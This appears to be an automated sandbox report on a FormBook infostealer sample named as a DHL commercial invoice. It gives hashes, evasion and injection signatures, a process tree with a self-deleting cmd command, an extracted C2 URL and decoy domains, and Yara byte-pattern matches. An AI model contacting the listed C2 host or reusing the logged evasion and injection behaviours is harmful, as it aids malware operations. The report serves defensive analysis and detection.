Edit tour

Windows Analysis Report
COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Overview

General Information

Sample name:	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Analysis ID:	1482411
MD5:	5ec011058b0884bc3b13563f97231c58
SHA1:	9846a460d630ea60c476df6dc92ae10d902bb54f
SHA256:	bc5a7642799c2f22d513dc19fb87848ecbe002f1815b2d5fd3a5af3fdbcdf0ae
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe (PID: 2412 cmdline: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe" MD5: 5EC011058B0884BC3B13563F97231C58)

svchost.exe (PID: 236 cmdline: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)

explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

cscript.exe (PID: 1368 cmdline: "C:\Windows\SysWOW64\cscript.exe" MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 2544 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crucka.xyz/jd21/"], "decoy": ["thepowerofzeus.com", "tampamlr.com", "00050591.xyz", "dominomusicmktlnc.com", "ai-defi.wiki", "tyumk.xyz", "gbqspj.club", "fostertv.net", "batremake.com", "nelwhiteconsulting.com", "amsya.com", "urbanholidayz.com", "463058.photos", "anag-gioielli.com", "kjsdhklssk73.xyz", "islarenta.com", "designed4lifecoaching.com", "autohotelsecrets.com", "susansellsmarin.com", "studyflow.xyz", "xdigistore.cloud", "zaib.art", "cabaiofficial.com", "lpocaxdb.xyz", "suziebujokmarketing.com", "skin-party.com", "maioral-store.com", "stellar-paws.com", "bfutureme.com", "slsmbcxw.xyz", "tech-with-thulitha.site", "kapten69pola.xyz", "carbon.services", "nourishingwithgreens.com", "ye78.top", "15ecm.com", "jeweljuice.store", "fasci.online", "ilovetvs.com", "85742668.com", "arthemis-168bet.site", "shangrilanovel.com", "somitk.online", "uhug.xyz", "dzaipu.com", "freyja.info", "senior-living-64379.bond", "p-afactorysale.shop", "vxjmjnwu.xyz", "fireborn-weldandfab.com", "californiacurrentelectric.com", "mantapnagita777.com", "tltech.xyz", "mrc-lithics.com", "marzottospa.com", "alivioquantico.com", "mercarfi.top", "bougeefilth.com", "suttonjstudio.com", "b2vvuc00.sbs", "pepenem.lol", "71421626.com", "viralvoter.com", "lvinghealthy.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe PID: 2412	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x115185:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: svchost.exe PID: 236	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x16f:$a1: 3C 30 50 4F 53 54 74 09 40 0x82acd:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: cscript.exe PID: 1368	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x35f71:$a1: 3C 30 50 4F 53 54 74 09 40 0x5957b:$a1: 3C 30 50 4F 53 54 74 09 40 0x5b387:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.svchost.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.svchost.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
2.2.svchost.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.svchost.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.svchost.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
